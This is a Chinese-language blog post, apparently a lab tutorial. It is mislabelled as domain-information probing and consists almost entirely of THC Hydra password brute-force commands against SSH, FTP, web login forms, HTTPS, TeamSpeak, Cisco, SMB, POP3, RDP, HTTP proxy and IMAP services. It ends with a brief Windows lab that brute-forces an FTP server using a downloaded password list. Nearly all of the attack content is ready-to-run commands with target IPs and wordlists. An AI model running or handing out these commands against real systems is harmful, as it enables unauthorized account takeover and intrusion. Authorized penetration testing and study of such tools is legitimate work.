域名信息探测实验

1、破解ssh:

 hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh

 hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp:

 hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

 hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交,破解web登录:

 hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/

 hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

 4、post方式提交,破解web登录:

 hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"

 hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

 (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。)

  5、破解https:

 hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

  6、破解teamspeak:

 hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

  7、破解cisco:

 hydra -P pass.txt 10.36.16.18 cisco

 hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

  8、破解smb:

 hydra -l administrator -P pass.txt 10.36.16.18 smb

 9、破解pop3:

 hydra -l muts -P pass.txt my.pop3.mail pop3

 10、破解rdp:

 hydra ip rdp -l administrator -P pass.txt -V

 11、破解http-proxy:

 hydra -l admin -P pass.txt http-proxy://10.36.16.18

 12、破解imap:

 hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

 hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

简单实验,进入目录C:\Tools\hack\thc-hydra-windows,从此目录打开命令行窗口:

下面就是配置密码字典了,我们可以自己构造字典,也可以下载别人整理好的密码字典,如下载https://weakpass.com/的online_brute:

使用hydra爆破ftp服务

hydra.exe -l ftp -P C:\ online_brute 172.16.33.33 ftp

测试使用账号密码登录

  • 22
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值